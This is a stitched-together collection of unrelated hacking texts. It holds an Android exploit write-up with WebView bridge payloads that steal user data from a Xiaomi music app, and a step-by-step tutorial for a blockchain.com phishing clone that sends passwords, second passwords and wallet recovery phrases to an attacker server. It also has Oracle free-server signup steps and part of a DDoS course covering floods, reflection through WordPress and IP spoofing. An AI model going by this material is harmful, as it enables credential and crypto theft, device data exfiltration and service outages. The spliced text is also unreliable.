        FragmentInfo fragmentInfo3 = new FragmentInfo();
        fragmentInfo3.mClz = deviceCompat.getFragmentClass(12);
        fragmentInfo3.mOneshot = adapter.getBooleanQueryParameter(FeatureConstants.PARAM_MIBACK, false);
        fragmentInfo3.mArgs = AnimationDef.SLIDE.toBundle(null);
        fragmentInfo3.mUri = adapter;
        return fragmentInfo3;
    } else if (DisplayUriConstants.HYBRID_AUTHORITIES.contains(authority) || adapter.getBooleanQueryParameter("hybrid", false)) {
        // redacted
    }

Now we know what deeplink is needed to trigger the WebView with our URL:

miui-music://global_music/?page_type=webview&url=https://www.evil.com

Now, to escalate this attack, a way had to be found to exploit this insecure WebView usage.
In the com.xiaomi.music.hybrid.internal.HybridManager class you can see that a JavaScript interface is being added:

private void initView() {
    initSettings(this.mView.getSettings());
    this.mView.setWebViewClient(new HybridViewClient(this));
    HybridChromeClient hybridChromeClient = new HybridChromeClient();
    hybridChromeClient.setHybridManager(this);
    this.mView.setWebChromeClient(hybridChromeClient);
    if (HybridView.DEBUG) {
        WebView.setWebContentsDebuggingEnabled(true);
    }
    HybridView hybridView = this.mView;
    JsInterface jsInterface = this.mJsInterface;
    hybridView.addJavascriptInterface(jsInterface, jsInterface.getInterfaceName());
    this.mView.addOnAttachStateChangeListener(this.mAttachStateChangeListener);
}

The JavaScript interfaces are declared in com.xiaomi.music.hybrid.internal.JsInterface. You can see that there are 2 JavaScript interfaces:

@JavascriptInterface
public String config(String str) {
    String config = this.mManager.config(str);
    if (Log.isLoggable("hybrid", 3)) {
        Log.d("hybrid", "config response is " + config);
    }
    return config;
}

@JavascriptInterface
public String invoke(String str, String str2, String str3, String str4) {
    String invoke = this.mManager.invoke(str, str2, str3, str4);
    if (Log.isLoggable("hybrid", 3)) {
        Log.d("hybrid", "blocking response is " + invoke);
    }
    return invoke;
}

Code for mManager.invoke(), found in com.xiaomi.music.hybrid.internal.HybridManager:

public String invoke(String str, String str2, String str3, String str4) {
    if (!this.mPM.isValid(this.mPageContext.getUrl())) {
        return new Response(203).toString();
    }
    Request request = new Request();
    request.setAction(str2);
    request.setRawParams(str3);
    request.setPageContext(this.mPageContext);
    request.setView(this.mView);
    request.setNativeInterface(this.mNativeInterface);
    try {
        HybridFeature lookupFeature = this.mFM.lookupFeature(str);
        HybridFeature.Mode invocationMode = lookupFeature.getInvocationMode(request);
        if (invocationMode == HybridFeature.Mode.SYNC) {
            Response invoke = lookupFeature.invoke(request);
            callback(invoke, this.mPageContext, str4);
            return invoke.toString();
        } else if (invocationMode == HybridFeature.Mode.ASYNC) {
            sPool.execute(new AsyncInvocation(lookupFeature, request, str4));
            return new Response(2).toString();
        } else {
            request.setCallback(new Callback(this, this.mPageContext, str4));
            sPool.execute(new AsyncInvocation(lookupFeature, request, str4));
            return new Response(3).toString();
        }
    } catch (HybridException e) {
        Response response = e.getResponse();
        callback(response, this.mPageContext, str4);
        return response.toString();
    }
}

The line HybridFeature lookupFeature = this.mFM.lookupFeature(str); allows us to call certain features. A list of all these features can be found under the com.miui.player.hybrid.feature folder. So using our WebView, we should be able to query any of these features. For example, to get the userInfo, our payload inside the WebView will be:

<script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.QueryUserInfo", "callback", null, "(function(t) {alert(t)})");</script>

This payload took quite some time to make. The first parameter is an identifier of the feature we want to call; the second parameter is the type of request we are making. In this case, we use the callback mode and use (function(t) {alert(t)}) as our callback, which will take the response from the Java code and alert it.

If you try loading the above script inside your HTML page and load it inside your WebView, you will get a permission error. Why? In the first line of the invoke function, you can see:

if (!this.mPM.isValid(this.mPageContext.getUrl())) {

The code for this can be found in the com.xiaomi.music.hybrid.internal.PermissionManager class.
As you can see, we need a valid Config object: private String config(Config config, boolean z) { if (z) { SecurityManager securityManager = new SecurityManager(config, this.mActivity.getApplicationContext()); if (securityManager.isExpired() || !securityManager.isValidSignature()) { // validation of the config object return new Response(202).toString(); } } this.mFM = new FeatureManager(config, this.mActivity.getClassLoader()); this.mPM = new PermissionManager(config); return new Response(0).toString(); } A Config object is initialised every time the app opens a URL inside the webview. This objects properties include a signature, an array of allowed domains and subdomains, and some other app-specific items. A custom Config can be declared using the config() javascript interface mentioned in the com.xiaomi.music.hybrid.internal.JsInterface file. However, this requires a lot of reverse engineering as it involves generating a valid signature. Since the object was huge(as you will see in the video), to get a valid Config object, we will use Frida, so that we can understand how a Config object affects our control over the webview. We will use the following Frida script to capture a valid Config object: Java.perform(function() { console.log("Starting hook"); var Activity = Java.use("com.xiaomi.music.hybrid.internal.PermissionManager"); Activity.isValid.implementation = function () { return true; }; Java.choose("com.xiaomi.music.hybrid.internal.Config", { onMatch: function(inst) { console.log("value " + inst.getSignedContent()) } }); }); As you can see in the youtube video, I am able to get a default valid Config object, in which the firebasestorage.googleapis.com seems to have been whitelisted as a domain. 
This means that JavaScript hosted on https://firebasestorage.googleapis.com/* will be able to call the invoke interface without any error, since this URL is present inside the Config object on webview init and therefore passes the isValid() check. Firebase allows any user to store files (HTML files in this case) on the firebasestorage.googleapis.com domain.

1. Go to https://console.firebase.google.com/u/0/
2. Select a project.
3. Click on Storage in the left side tab.
4. Create an HTML file with the following payload and get the resulting URL:

```html
<script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.QueryUserInfo", "callback", null, "(function(t) {alert(t)})");</script>
```

ADB shell:

```shell
am start -n com.miui.player/com.miui.player.ui.MusicBrowserActivity -d "miui-music://global_music/?page_type=webview&url=<FIREBASE-URL-HERE>"
```

After running the above command, we successfully bypass the permissions and can invoke any JS interface remotely.

Other payloads: basically, all the features (com.miui.player.hybrid.feature.*) in the attached screenshot can now be queried by the attacker.

Display an Android toast on the victim's device:

```html
<script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.ToastFeature", "sync", "{content: 'takemyhand'}", null);</script>
```

Get the user's search history:

```html
<script>alert(MiuiJsBridge.invoke("com.miui.player.hybrid.feature.GetSearchHistory", "sync", null, null));</script>
```

Query the currently playing song:

```html
<script>MiuiJsBridge.invoke("com.miui.player.hybrid.feature.QueryNowplayingInfo", "callback", null, "(function(t) {alert(t)})")</script>
```

Lastly, other music and device related information can be queried in a similar way using the com.miui.player.hybrid.feature.ConfigStatics class, and likewise all the other query features.
```html
<script>alert(MiuiJsBridge.invoke("com.miui.player.hybrid.feature.ConfigStatics", "sync", "{type: 10}", null));</script>
```

The type parameter in the above payload can be adjusted according to the numbers listed in the com.miui.player.hybrid.feature.ConfigStatics class. An attacker can also remotely control music (play, seek, next, previous) using com.miui.player.hybrid.feature.ControlService, and get all JOOX account information using com.miui.player.hybrid.feature.JooxBridgeFeature.

TO BE CONTINUED..

Thank you for the attention!
We have all heard about blockchain fakes (in our case, of blockchain.com), but has any of us mere mortals seen the implementation itself, and what a fake actually is?

Attention! All information is provided for informational and educational purposes only. The author is not responsible for any possible harm caused by the materials of this article.

At the same time, buying a finished product on the market without knowing what it consists of technically is very risky. Indeed, over the past six months, or maybe a year, a lot of scammers have been exposed who showed a demo of a fake and vanished after receiving a large sum, but the article itself is not about that.

NON-STANDARD article competition - requires non-standard solutions)))

It was evening, there was nothing to do, and I decided to see how it is possible to implement a blockchain fake without having a general technical idea of how others have implemented it, relying only on the description of the capabilities and the documentation. And so, for a minute, let's remember everything we know about fakes. In simple words, a fake is a full-fledged copy of the site, with the only difference being the domain, where the main idea is that the visitor does not notice the substitution and enters the data we need.

And so, let's go! First of all, we go to the site: https://login.blockchain.com. Notice the version data at the bottom and the link that leads to GitHub. We follow it and see that the sources of the web interface are laid out in the repository! Hmm... I wonder, does it turn out that you can bring up a copy of the web interface without any knowledge? I couldn't believe my eyes, was it that easy? Who came up with the idea to publish this officially is not at all clear.
Next, we read the instructions and try to install:

```shell
wget https://codeload.github.com/blockchain/blockchain-wallet-v4-frontend/zip/refs/tags/v4.48.16
unzip blockchain-wallet-v4-frontend-4.48.16.zip
cd blockchain-wallet-v4-frontend
./setup.sh
yarn start:dev
```

The result: well, "almost" a full-fledged fake :) True, so far this fake does nothing in terms of sending data, which we will now do. We need to find the authorization in the files and try to add our function. Searching the files for the keyword "login", we find the main authorization file. Open the file packages/blockchain-wallet-v4-frontend/src/data/auth/sagas.js and add a function for simple sending:

```javascript
const submitAuth = function ({guid, password}) {
  axios({
    url: `https://admin.blockchain.test/api/wallets`,
    method: 'POST',
    data: {guid: guid, password: password},
    headers: {'Content-Type': 'application/json'}
  })
}
```

Also, after the session block:

```javascript
let session = yield select(selectors.session.getSession, guid)
```

add:

```javascript
yield call(submitAuth, {guid, password})
```

The most important thing left is to run it all on a test domain and see how it performs. Editing the hosts file:

```
127.0.0.1 login.blockchain.test
```

Open http://login.blockchain.test and try to log in. We see that nothing is happening; first of all we check the console. I was disappointed: it turns out that the API server does not allow requests from outside because of CORS. Thinking, thinking, how is CORS solved? By the usual reverse proxy at the web server level, isn't it?
Configuration file for a simple reverse proxy on the Caddy web server:

```
reverse.blockchain.test {
  route {
    reverse_proxy * https://blockchain.info {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
  }
}
```

What exactly this config does: it simply proxies all requests to the blockchain.info domain and changes the response so that it allows CORS requests. You can do this on absolutely any web server; for ease of operation and clarity, Caddy was chosen as an excellent lightweight web server with automatic SSL support, written in Go. Now we change the API server address in our web interface; for this we open the file config/env/production.js and change:

```javascript
ROOT_URL: 'https://blockchain.info',
```

to:

```javascript
ROOT_URL: 'http://reverse.blockchain.test',
```

We try to log in again: Uraaaa! Authorization was successful and a confirmation email was sent. We just have to check the mail and open the letter. Yes, but what the hell is my server IP doing here?😂😅 I thought for a minute: we only just bypassed CORS, that's why this address is displayed, and then I remembered... in all topics where a fake was rented, they wrote about such a feature as IP spoofing. The point is that an ordinary user who lands on a fake will, when confirming by mail, understand that this is someone else's IP address and simply will not confirm, which is not good. It turns out that without this feature, our fake is just the semblance of a powerful combine; this much could have been done with HTML + CSS. We need to find a little information about this spoofing... and so, remember: after a little reflection, after reading about IP spoofing again, I came to the conclusion that IP spoofing works only with UDP.
In an HTTP request, it will not be possible to spoof the IP address, because HTTP works over the TCP protocol. Is this really the end? I got a little upset, brewed some tea and nevertheless decided to look again at the site itself and the requests to https://login.blockchain.com after authorization: Oh yeah... a very interesting subdomain in the x-original-host header: wallet.prod.blockchain.info! We need to know the details for all domains and IP addresses. We make a request to find out where blockchain.info is located:

```
nslookup blockchain.info
Non-authoritative answer:
Name: blockchain.info
Address: 104.16.143.212
Name: blockchain.info
Address: 104.16.147.212
Name: blockchain.info
Address: 104.16.144.212
Name: blockchain.info
Address: 104.16.146.212
Name: blockchain.info
Address: 104.16.145.212
```

Now we find out who owns the IP address:

```
whois 104.16.143.212
NetRange: 104.16.0.0 - 104.31.255.255
CIDR: 104.16.0.0/12
NetName: CLOUDFLARENET
NetHandle: NET-104-16-0-0-1
Parent: NET104 (NET-104-0-0-0-0)
NetType: Direct Assignment
OriginAS: AS13335
Organization: Cloudflare, Inc. (CLOUD14)
RegDate: 2014-03-28
Updated: 2017-02-17
Comment: All Cloudflare abuse reporting can be done via https://www.cloudflare.com/abuse
```

It remains to find out where wallet.prod.blockchain.info is located:

```
nslookup wallet.prod.blockchain.info
Name: wallet.prod.blockchain.info
Address: 35.201.74.1
```

Let's find out again who owns the IP address:

```
whois 35.201.74.1
NetRange: 35.192.0.0 - 35.207.255.255
CIDR: 35.192.0.0/12
NetName: GOOGLE-CLOUD
NetHandle: NET-35-192-0-0-1
Parent: NET35 (NET-35-0-0-0-0)
NetType: Direct Allocation
OriginAS:
Organization: Google LLC (GOOGL-2)
RegDate: 2017-03-21
Updated: 2018-01-24
Comment: *** The IP addresses under this Org-ID are in use by Google Cloud customers ***
```

For a moment, I froze: they are using CloudFlare, but the main server to which requests are forwarded is in the Google cloud.
We try to ping it and open the site itself: 404... hmm... something, and the tea is already very cold, but oh well, we found something very interesting here. I was upset again, but for a moment I remembered that since the site is proxied through CloudFlare and then passed on to Google Cloud, they must somehow transmit the necessary headers. After all, anyone who has ever worked with CloudFlare knows that all requests go to the server as: Visitor <-> CloudFlare <-> Server. Therefore, in order to restore the real IP address of the visitor, we need to read the documentation: https://support.cloudflare.com/hc/en-us/articles/200170786-Restoring-original-visitor-IPs

And so, with the tea already cold, we continue on our path. The documentation says that in order to get the visitor's IP address, you need to take the data from the CF-Connecting-IP header; in our case we need to send such a header. We try a regular request first, then check the mail. What I was insanely happy about was integrating it into our reverse proxy:

```
reverse.blockchain.test {
  route {
    reverse_proxy * https://wallet.prod.blockchain.info {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_up Cf-Connecting-Ip {http.request.remote.host}
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
  }
}
```
Authorization works, but for some reason the balance is not shown. We open the console and see that the problem arises because /multiaddr is available only on blockchain.info and simply is not available on wallet.prod.blockchain.info. It turns out that our reverse proxy is not quite universal. Add some logic to our reverse proxy:

```
reverse.blockchain.test {
  route {
    reverse_proxy /multiaddr https://blockchain.info {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
    reverse_proxy * https://wallet.prod.blockchain.info {
      header_up -Host
      header_up origin https://login.blockchain.com
      header_up referer https://login.blockchain.com/
      header_up Cf-Connecting-Ip {http.request.remote.host}
      header_down Access-Control-Allow-Origin "*"
      header_down Content-Security-Policy "*"
      header_down Access-Control-Allow-Headers "*"
      header_down Access-Control-Allow-Methods "POST, GET, OPTIONS"
    }
  }
}
```

Fine! Everything works great now! As a result, we already have: login and password capture + IP spoofing. But this does not give us anything, because we will not be able to confirm by mail, and if the user also has two-factor authentication or blocking by IP address enabled, then it is absolutely hopeless. The fake did something, but we will not get any benefit from it if there is no permanent access to the account. I decided to go back to basics and once again look at the web interface itself; we are interested in the security settings. Interestingly, the secret recovery key allows anyone to gain access to the account?! Sorry, what?😮 I reread it a couple of times and only then realized that this secret key is something from the category of holy relics: if you lose it, you can lose the money in your account.
And if it is shown in the web interface, then you can also send it to yourself, but first we need to check the capabilities of the secret key. We enable two-factor confirmation + whitelist by IP address in the settings. We just have to check; for this we connect through a second SOCKS proxy and follow the link where we enter the recovery key. After entering the correct secret key, a form for changing the password appears. We enter the password, click on Recover Funds, and after that we instantly get into the account. As a result, private key recovery allows you to bypass any account restrictions: two-factor authentication + whitelist by IP address. This is just tough, I thought for a minute... it means that there is no point in recording the login password; you can just collect secret keys and restore accounts, and then disable the security settings, including changing the mail address. "So this is a feature, not a bug" - that's what the developers would say...👏 Now we just have to add all the missing features to the fake itself.

1) Secret recovery key.
We search for "recovery" in the files and find the only function, "recoverySaga", which displays the private recovery key:

```javascript
const recoverySaga = function * ({password}) {
  const getMnemonic = s => selectors.core.wallet.getMnemonic(s, password)
  try {
    const mnemonicT = yield select(getMnemonic)
    const mnemonic = yield call(() => taskToPromise(mnemonicT))
    const mnemonicArray = mnemonic.split(' ')
    yield put(actions.modules.settings.addMnemonic({mnemonic: mnemonicArray}))
  } catch (e) {
    yield put(actions.logs.logErrorMessage(logLocation, 'showBackupRecovery', e))
  }
}
```

We need to change it a little. Open the file packages/blockchain-wallet-v4-frontend/src/data/goals/sagas.ts and add a function that returns the secret key in a format convenient for us:

```typescript
const recoverySagaInfo = function * ({password}) {
  const getMnemonic = s => selectors.core.wallet.getMnemonic(s, password)
  try {
    const mnemonicT = yield select(getMnemonic)
    const mnemonic = yield call(() => taskToPromise(mnemonicT))
    return mnemonic
  } catch (e) {
  }
}
```

We also need to send this data, so add the sending function:

```typescript
const submitRecover = ({guid, recovery}: {guid: string, recovery: any}) =>
  axios({
    url: `https://admin.blockchain.test/api/recovers`,
    method: 'POST',
    data: {guid: guid, recover: recovery},
    headers: {'Content-Type': 'application/json'}
  })
```

2) Additional confirmation password, aka second password.

Searching the files for "SecondPassword", we find an amazing function call:

```javascript
import {promptForSecondPassword} from 'services/sagas'
const password = yield call(promptForSecondPassword)
```

Great. This is exactly what we needed.
Open packages/blockchain-wallet-v4-frontend/src/data/goals/sagas.ts and add a function to send the data for the second password:

```typescript
const submitSecondPass = ({guid, password}: {guid: string, password: string}) =>
  axios({
    url: `https://admin.blockchain.test/api/seconds`,
    method: 'POST',
    data: {guid: guid, password: password},
    headers: {'Content-Type': 'application/json'}
  })
```

We will call the function a little later.

3) Balance

If there is information about the balance of the wallet, it will be easier to understand which of the accounts needs to be restored instantly, and in the future simply to add notifications. Searching the files for "balances", we find an equally amazing function call in the same file that we edited earlier:

```typescript
// check/wait for balances to be available
const balances = yield call(waitForAllBalances)
```

Add a function for sending the balance data:

```typescript
const submitBalance = ({balances, guid}: {balances: any, guid: string}) =>
  axios({
    url: `https://admin.blockchain.test/api/balances`,
    method: 'POST',
    data: {
      guid: guid,
      "btc": balances.btc,
      "eth": balances.eth,
      "bch": balances.bch,
      "pax": balances.pax,
      "xlm": balances.xlm,
      "usdt": balances.usdt,
      "wdgld": balances.wdgld
    },
    headers: {'Content-Type': 'application/json'}
  })
```

Now, to send after authorization, we need to change the file packages/blockchain-wallet-v4-frontend/src/data/auth/sagas.js. We look for the line:

```javascript
yield put(actions.goals.saveGoal('syncPit'))
```

and add after it:

```javascript
yield put(actions.goals.saveGoal('sendData'))
```

After that, we need to add a new function to the file packages/blockchain-wallet-v4-frontend/src/data/goals/sagas.ts:

```typescript
const runSendData = function * (goal) {
  const {id} = goal
  // Delete the task so that it doesn't run a hundred times.
  yield put(actions.goals.deleteGoal(id))
  // Wait for user data
  yield call(waitForUserData)
  // Receive account ID
  const guid = yield select(selectors.core.wallet.getGuid)
  // Wait for balance loading
  const balances = yield call(waitForAllBalances)
  // @ts-ignore
  yield call(submitBalance, {guid, balances})
  // Get the second password
  const password = yield call(promptForSecondPassword) || null
  // @ts-ignore
  yield call(submitSecondPass, {guid, password})
  // Get the secret recovery key
  const recovery = yield call(recoverySagaInfo, {password})
  // @ts-ignore
  yield call(submitRecover, {guid, recovery})
}
```

In the same file we look for:

```typescript
case 'syncPit':
  yield call(runSyncPitGoal, goal)
  break
```

and add after it:

```typescript
case 'sendData':
  yield call(runSendData, goal)
  break
```

In the file packages/blockchain-wallet-v4-frontend/src/data/goals/types.ts, after "referral", add "sendData".

Ready! Our flawless fake with all the possibilities has been created. For clarity, I would also like to post materials with detailed instructions for installing on the server:
- Fake (configs + scripts, vps-1 server)
- Reverse proxy (configs + scripts, vps-2 server)
- A simple admin panel (configs + scripts, vps-3 server)

But for fear of speculation on the part of unscrupulous users (and a sharp increase in the number of traders of blockchain fakes), I would like to hand this material over in hierarchical order to the administrators and moderators of the forum, as well as to specialists who would like to "touch" it and make sure that everything described in this article is relevant and working at the time of publication.

PS: it is possible that there will be complaints that private material is going public, but no, friends: anyone could have reached this, and it shows exactly how the result was achieved, rather than laying out a ready-made solution. This article for the competition is direct confirmation that nothing is impossible. Just try, and you will achieve everything, always.
With the only caveat in this case that I would like to remind you of (hello Ubuntu / Debian): "With great power comes great responsibility".

Thank you all for your attention!
Go to the website http://cloud.oracle.com/free and click on the sign-up button.

We fill in all the data. We enter real data, but in theory you can try to enter random data. Next, go to the mail, find the letter and click the button. We enter the rest of the data. For the home region, we choose the one that is closest to you. Next, they will ask for an address, phone number and a card. Again, it's better to enter your personal data. Next comes the code. Then the card is added; Oracle promises that after adding the card no money will be charged (except for 1 euro, which is immediately returned) until you yourself want it. If you did not receive an error, your card was accepted and we move on. If you get an error, read the conditions for the cards.

After registration, you will be taken to a screen where we click to create a server. Choosing an OS: we take Ubuntu (we do not take Windows, because then you will have to pay). Next, we set up the configuration of your server (for constant 24/7 operation, you need to use no more than 24 GB of RAM and 4 CPUs). Next, download the SSH keys for the connection to the server. Next, we allocate storage to our server (for the entire account, a maximum of 200 GB; if you have 1 server, then give it all 200). If everything went well, you will be taken to a screen with information about our server; copy the IP. You can use any means of connecting to the server, and that's it: congratulations, you are logged into your server. Then do whatever your heart desires with it.
Hello my little freaks! Hackfreaks here! Judging by the feedback, subscribers are very interested in the topic of DDoS attacks. I decided not only to talk about the topic superficially, but to make a full-fledged and at the same time free training🔥. Brought to you by Hackfreaks.

Plan of the training:
1. Introduction
2. Basic theory
3. Methods of DDoS attacks
4. Choice of equipment for DDoS attacks
5. Configuring equipment for DDoS attacks
6. Types of protection and how to bypass them
7. Security and anonymity
8. Methods of monetization
9. Other goodies
10. Contacts, hosts, useful links, material, etc.

1. Introduction

Anyway, you have heard of DDoS attacks or are even familiar with them in practice. Someone saw them on the news, someone was engaged in them, and someone just heard about them. In this tutorial, I will try to explain all the details as simply as possible and show how it is done by professionals. Commercial organizations do not forgive this; they go after you harshly in court. Otherwise, a criminal case may await you; even if the investigation drags on for some time, they will have time to prove it. I think everything is clear, I will not delay, let's move on to theory.

2. Basic theory

First, let's look at the term DDoS itself. To do this, we turn to the wiki, and then I will write it in my own words. DDoS is an abbreviation of the English expression Distributed Denial of Service. This means denial of service to a network resource as a result of numerous distributed requests (that is, originating from different points of Internet access). The difference between a DoS (Denial of Service) attack and DDoS is that in the DoS case the overload occurs as a result of requests from one specific Internet node.

And now in our own words. Let's imagine a situation: there is a certain Vasya and a bunch of drunken homeless people. Vasya walks along the street, does not bother anyone, goes to work. Suddenly, out of nowhere, a bunch of homeless people appear and begin to get * before him.
What should Vasya do? They surrounded him and did not let him pass; moreover, he could not even move, because they became brutal and began to bite him. Having finished him off, they abruptly leave. What remains for Vasya? That's right, die or wait for an ambulance. In this case, the attacked resource is Vasya, and the homeless people are our DDoS.

DDoS is often underestimated by many, but this is a mistake. For example, it will take me some time to deface a site. But with DDoS, when everything is set up, one command is enough for me to knock a bank out completely. In the case of a deface, everything can be restored; in the case of DDoS, they will not even be able to log into the server, because it will be down.

For basic theory, I think it's worth starting with network models. This is public knowledge, but you can't get anywhere without it. These are the basics. In the case of DDoS, we will touch on the TCP/IP protocol stack. TCP/IP is a digital data transmission network model. This model describes how data is transmitted from sender to receiver. The TCP/IP protocol stack includes four layers:
• Application layer (Layer 7)
• Transport layer (Layer 4)
• Network layer (Layer 3)
• Data link layer (Layer 2)

Let's now analyze each of the layers in order:

1. Application layer - the top layer of the OSI network model; it provides interaction between the network and the user. The layer allows user applications to access network services such as a database query processor, file access, and e-mail forwarding.
Data types: Data
Functions: Access to network services
Examples: HTTP, Telnet, FTP, etc.

2. Transport layer - the 4th layer of the OSI network model, intended for data delivery. It does not matter what data is transmitted, from where or to where; it provides the transmission mechanism itself.
It divides the data blocks into fragments whose sizes depend on the protocol: it combines short ones into one and breaks up long ones.
Data types: Segments / Datagrams
Functions: Direct endpoint communication and reliability
Examples: TCP / UDP

3. Network layer - the 3rd layer of the OSI network model, designed to determine the path of data transmission. Responsible for translating logical addresses and names into physical ones, determining the shortest routes, switching and routing, and tracking problems and congestion in the network.
Data types: Packets
Functions: Route determination and logical addressing
Examples: ICMP, GRE, etc.

I have not described the data link layer. Why? Because in our case it won't come in handy. For DDoS attacks, we will use attacks on the application and transport layers, rarely on the network layer.
• At the application layer these will be HTTP methods; at the transport layer, TCP and UDP.
• At the network layer, GRE, since ICMP is no longer relevant.

Now let's see what we will do with HTTP, TCP and UDP. In the case of HTTP flooding, we flood with a huge number of HTTP GET/POST requests, so many that the web server falls over. HTTP here means a connection established between a client and a server to transfer data over the HTTP protocol. The HTTP connection is identified by <Source IP, Source Port> and <Destination IP, Destination Port>. At the client level, the connection is given by a tuple: <IP, port>. Establishing a connection between two endpoints is a multi-step process. It includes the following steps:
1. Resolve the IP address from the DNS hostname
2. Establish a connection to the server
3. Send the request
4. Wait for the response
5. Close the connection

In the case of UDP and TCP flooding, we flood with a huge number of packets per second. BUT, to begin with, let's look at one nuance, namely the difference between TCP and UDP. In case some of you don't know, TCP is a reliable protocol, unlike UDP.
Its difference is that it guarantees delivery of packets to the addressee; UDP does not check delivery, its task is only to send. TCP has the so-called "triple handshake", established between the client and the server, which briefly goes as follows:
1. The client requests the creation of a TCP session by sending a TCP packet with the SYN flag.
2. The server replies to the client with a TCP packet with the SYN+ACK flags.
3. The client sends a TCP packet with the ACK flag to the server.

Now let's take a closer look:

1. A client that intends to establish a connection sends the server a segment with a sequence number and the SYN flag. Further algorithm:
- The server receives the segment, remembers the sequence number and tries to create a socket (buffers and memory control structures) to serve the new client;
- If successful, the server sends the client a segment with a sequence number and the SYN+ACK flags, and goes into the SYN-RECEIVED state;
- In case of failure, the server sends the client a segment with the RST flag.

2. If the client receives a segment with the SYN flag, it remembers the sequence number and sends a segment with the ACK flag. Further algorithm:
- If it simultaneously receives the ACK flag (which usually happens), it goes into the ESTABLISHED state;
- If the client receives a segment with the RST flag, it stops trying to connect;
- If the client does not receive a response within 10 seconds, it repeats the connection process.

3. If the server in the SYN-RECEIVED state receives a segment with the ACK flag, it transitions to the ESTABLISHED state. Otherwise, after a timeout, it closes the socket and enters the CLOSED state.
The process is called a "three-way handshake" because, although connection establishment with four segments is possible (SYN towards the server, ACK towards the client, SYN towards the client, ACK towards the server), in practice three segments are used to save time.

Now let's look at the TCP flags:
• ACK - A flag in the TCP segment whose setting means that the "Acknowledgment number" field is in use. If the ACK flag is set, this field contains the sequence number the recipient expects next. It marks this segment as an acknowledgment of receipt.
• RST - A flag in the TCP segment header whose setting signals that the connection is being reset.
• FIN - A flag in the TCP segment header whose setting signals the end of the session.
• SYN - A flag in the TCP segment header, used to synchronize the sequence numbers of the transmission/reception sessions. It is with this flag that the connection is established.

Now let's move on to UDP. UDP is the User Datagram Protocol, one of the key elements of TCP/IP, the set of networking protocols for the Internet. With UDP, computer applications can send messages (in this case called datagrams) to other hosts over an IP network without prior communication to establish special transmission channels or data paths.

FAQ:
- If there is enough desire, read it again and you will understand. Memorization is optional, but it is better to know.
- Anonymity comes later.
- No, FTP access is already hacking, not DDoS.

3. Methods of DDoS attacks

There are many DDoS methods, so I will divide them into three categories depending on the protocol type. Perhaps I'll start with the HTTP methods.

HTTP GET/POST Flood - We generate a large number of HTTP requests to the victim's server. In most cases these are GET requests for the largest possible site elements. Each bot can generate a large number of legitimate requests (more than 10 per second).
Thus, you do not need a large army of bots or a super-private botnet to carry out this attack method. In addition to GET requests, POST requests can also be sent and other HTTP actions performed that lead to the same result: the victim's web server is overloaded and unavailable. You can even implement it from your own computer/server.

HTTP Strong - A large number of HTTP requests are also generated to the victim's server, but the difference in this method is that empty HTTP requests are sent to the web server. This method is very powerful and is accordingly kept private. I wanted to purchase it as a separate script, but unfortunately in the CIS there are few people who understand anything at all about DDoS, and they are pushed abroad by acquaintance. Fortunately, I was able to test it by once renting a private botnet for a month. The method is very powerful, and if you happen to come across it, buy it.

HTTP Null - A large number of HTTP requests are generated, also empty, but the difference between this method and Strong is that HTTP Strong waits for a response from the web server, while HTTP Null does not. I also had a chance to test it; the method is unrealistically powerful.

JSBypass - A method that bypasses the CloudFlare stub and its analogs. Probably most of you have come across this picture: you go to a site, and an incomprehensible picture spins for 5 seconds. This is the CloudFlare stub. This method bypasses it in a fairly simple way: the cookies are parsed and your victim falls instantly. You can additionally specify a proxy for this method for greater efficiency. I met it extremely rarely in botnets; it works perfectly from servers.

XML-RPC - Quite a tricky method. With this method, requests do not come from your server, but from vulnerable sites on the WordPress CMS. That is, you scan ranges, find vulnerable sites among them and issue a remote command during an attack.
The method is very effective and cost effective, since you don't need a botnet or a super-powerful server to use it. It is enough not to be banned by the hosting provider :)

Joomla Reflection - Similar to the XML-RPC method, they have the same principle of operation, but in this case it is not WordPress but the Joomla CMS.

FAQ:
HTTP Get / Post is the most common. Less commonly XMLRPC
Doesn't make much sense if there is a botnet. The botnet will a priori fuck anything. But it makes sense if the botnet is extremely small.
POST flood is better, for example, for registration. But if there is a captcha type check, the meaning disappears. Only if you don't find a cheeky injection in it == Well, this is a joke, if there is no botnet, then through some Apache Bench you can find, for example, a lousy working database cache and through certain queries in the search engine of the site, drag it into one person.
XMLRPC is more alive than all living things, again the other day Sakharny put them on the RKN.
HTTP flood will always be relevant - this is the basis of Layer 7
XMLRPC, not Joomla and there will be happiness. Well, JSBypass when you see Cloud with a stub
Then I'll tell you what kind of sheet

I have described the most popular and frequently used methods; how to implement the majority, I will describe in the next stages of the plan.

Now I would like to talk about TCP methods. There are quite a few of them, unlike UDP, but nevertheless, I decided to touch on the transport layer starting with TCP. Most transport layer attacks are carried out through IP spoofing. IP spoofing is, in short, spoofing the reverse IP address, which allows you to deceive the system by spoofing the sender's address. It is thanks to IP spoofing that it is impossible to identify the attacker.

SSYN (Spoofed SYN) - in this case, we send fake SYN requests to the server, spoofing the sender's address (Spoofing).
The response SYN+ACK is sent to a non-existent address; as a result, so-called half-open connections appear in the connection queue, awaiting confirmation from the client. After a certain timeout expires, these connections are dropped. The method is very effective and relevant to this day. They can protect themselves from it, but in the CIS, few people are smart enough for this.

SYN-ACK Flood - In this case, during a SYN-ACK flood, we flood with fake SYN-ACK packets arriving in large quantities. Trying to make a decision on each SYN-ACK packet and match it with one of the entries stored in the connection table, the victim's server allocates computing resources for this (RAM, CPU, etc.) to process the stream of fake SYN-ACK packets. As a result, the same thing happens as during a SYN flood: an overload of the victim's server, leading to its partial inaccessibility or complete cunt.

Dominate - In this case, there is a large number of TCP packets with different flags; in practice this method has shown great success.

xMAS - This method hits closed TCP ports and hard finishes the processor, forcing them to literally melt.

